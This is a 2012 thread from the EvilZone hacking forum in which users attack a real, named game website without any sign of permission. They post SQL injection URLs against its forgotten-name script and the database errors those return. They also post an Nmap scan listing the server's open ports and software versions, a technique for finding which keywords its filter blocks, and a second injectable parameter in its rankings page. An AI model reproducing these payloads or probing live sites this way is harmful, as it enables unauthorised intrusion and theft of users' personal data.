EvilZone
Hacking and Security => Hacking and Security => : fr0wnR December 10, 2012, 06:26:34 PM
-
www.tantrix.com/cgi-bin/forgot_name.cgi?pname='or 1=1; -- (http://evilzone.org/www.tantrix.com/cgi-bin/forgot_name.cgi?pname='or 1=1; --)
This works, I'm getting a sql error:
Error SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%'or 1=1-%' ORDER BY date_joined DESC: (67.159.36.26 /cgi-bin/forgot_name.cgi?pname='or%201=1- : execute) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' ORDER BY date_joined DESC' at line 1
Now I'm trying to get e.g. the version (with @@version), but then I'm getting to a forbidden page. Does this simply mean that its not injectable or am I doing something wrong?
This would be my idea with @@version:
tantrix.com/cgi-bin/forgot_name.cgi?pname=test%'; SELECT @@version; --
The SQL query then:
SELECT uid,player_name,e_mail,country,date_joined FROM players where player_name like '%test%'; SELECT @@version; -- the rest commented out
-
Forbidden pages usually means some sort of filtering. Tried @@vErSion? :)
-
Forbidden pages usually means some sort of filtering. Tried @@vErSion? :)
Hmm, doesnt work either..
I will try encoding it, but I dont think this will change anything.
Is it really not injectable??
-
Without trying myself I can already say:
.... that corresponds to your MySQL server version for ...
...got it?
-
Wait this is genius :D
They have MySQL 5.0.91-community.
Will read through the changes, thank you!
-
Well I took a deeper look at the vulnerability.
It is indeed injectable. But there is a simple WAF aka filtering going on. Its just the select keyword "from" that gets filtered and /etc/passwd as I noticed but nothing else so far.
Conclusion: You cannot bypass the keyword "from" and you don't have file privileges. You can extract the information about the player table with the given Select statement but beside that there is no exploitation by sqli possible on this parameter.
Apache is 1.3.41 though ...
cheers
-
Thank you for the nice explanation!
How did you find out which keywords are getting filtered out? Just trying or software?
And yeah, the whole software set is old on their server.
Starting Nmap 5.00 ( http://nmap.org ) at 2012-12-02 22:48 CET
Interesting ports on 69.36.8.247:
Not shown: 976 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
25/tcp open smtp Courier smtpd
26/tcp open smtp Courier smtpd
53/tcp open domain ISC BIND 9.2.4
80/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
110/tcp open pop3 Courier pop3d
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
143/tcp open imap Courier Imapd (released 2010)
443/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
445/tcp filtered microsoft-ds
587/tcp open smtp Courier smtpd
993/tcp open ssl/imaps?
995/tcp open ssl/pop3s?
3000/tcp open http ServerCP httpd
3001/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
3306/tcp open mysql MySQL 5.0.91-community
4321/tcp open http Apache httpd 1.3.41 ((Unix) PHP/5.2.14 FrontPage/5.0.2.2510 mod_ssl/2.8.31 OpenSSL/0.9.7a)
5432/tcp open postgresql PostgreSQL DB
6666/tcp filtered irc
6667/tcp filtered irc
6668/tcp filtered irc
6669/tcp filtered irc
Service Info: Host: server2.tantrix.com; OS: Unix
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.78 seconds
-
How did you find out which keywords are getting filtered out? Just trying or software?
Comment out the rest of the string and type your keywords into the comment part.
... 1,2,3,4,5 -- xx from
By the way: Just by clicking around I already found an orderby injection:
http://www.tantrix.com/cgi-bin/gs_rankings2.cgi?order-by=ranking2'&country=Spain (http://www.tantrix.com/cgi-bin/gs_rankings2.cgi?order-by=ranking2'&country=Spain)